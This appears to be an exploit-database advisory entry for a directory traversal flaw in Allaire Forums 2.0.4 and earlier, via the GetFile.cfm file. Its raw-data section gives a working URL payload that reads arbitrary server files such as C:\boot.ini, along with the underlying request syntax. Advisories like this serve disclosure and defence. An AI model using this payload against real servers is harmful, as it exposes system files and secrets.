header-logo
Suggest Exploit
vendor:
Allaire Forums
by:
6.4
CVSS
MEDIUM
Directory Traversal
22
CWE
Product Name: Allaire Forums
Affected Version From: Forums 2.0.4 and earlier
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Allaire Forums Directory Traversal Vulnerability

An Allaire Forums file "GetFile.cfm" in the root of the application directory allows anyone to access any file on the Forums server. This vulnerability affects Forums 2.0.4 and earlier.

Mitigation:

Apply the necessary patches or upgrade to a newer version to mitigate this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/229/info

An Allaire Forums file "GetFile.cfm" in the root of the application directory allows anyone to access any file on the Forums server. This vulnerability affects Forums 2.0.4 and earlier. 

Type the URL "GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\boot.ini" (without the quotes") where C:\boot.ini is the pathname and file to read.

The syntax of the request is <CFCONTENT TYPE="#FT#/#FST#" FILE="#FilePath#">

Navigation

Suggest Exploit

Services By CQR

cqrsecured